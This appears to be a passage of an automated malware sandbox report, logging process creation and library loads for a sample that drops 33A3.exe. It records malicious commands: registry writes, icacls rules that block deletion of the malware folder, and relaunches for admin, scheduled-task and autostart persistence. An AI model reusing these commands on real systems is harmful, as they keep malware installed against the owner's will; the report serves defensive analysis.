Source: 33A3.exe	String found in binary or memory: id-cmc-addExtensions

Source: unknown	Process created: C:\Users\user\Desktop\XVM5nluelx.exe "C:\Users\user\Desktop\XVM5nluelx.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\dejcbcc C:\Users\user\AppData\Roaming\dejcbcc
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\B88.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\33A3.exe C:\Users\user\AppData\Local\Temp\33A3.exe
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process created: C:\Users\user\AppData\Local\Temp\33A3.exe C:\Users\user\AppData\Local\Temp\33A3.exe
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process created: C:\Users\user\AppData\Local\Temp\33A3.exe "C:\Users\user\AppData\Local\Temp\33A3.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process created: C:\Users\user\AppData\Local\Temp\33A3.exe "C:\Users\user\AppData\Local\Temp\33A3.exe" --Admin IsNotAutoStart IsNotTask
Source: unknown	Process created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe --Task
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Process created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe --Task
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5C0B.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe "C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe" --AutoStart
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Process created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe "C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe" --AutoStart
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe "C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe" --AutoStart
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Process created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe "C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe" --AutoStart
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1028 -s 10828
Source: unknown	Process created: C:\Windows\explorer.exe explorer.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\dejcbcc C:\Users\user\AppData\Roaming\dejcbcc
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\B88.bat" "	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\33A3.exe C:\Users\user\AppData\Local\Temp\33A3.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5C0B.bat" "	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe "C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe" --AutoStart	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe "C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe" --AutoStart	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process created: C:\Users\user\AppData\Local\Temp\33A3.exe C:\Users\user\AppData\Local\Temp\33A3.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d" /deny *S-1-1-0:(OI)(CI)(DE,DC)	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process created: C:\Users\user\AppData\Local\Temp\33A3.exe "C:\Users\user\AppData\Local\Temp\33A3.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Process created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe --Task	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Process created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe "C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe" --AutoStart
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Process created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe "C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe" --AutoStart

Source: C:\Users\user\Desktop\XVM5nluelx.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dejcbcc	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dejcbcc	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dejcbcc	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: drprov.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: ntlanman.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: davclnt.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: davhlpr.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: browcli.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: netapi32.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: profapi.dll
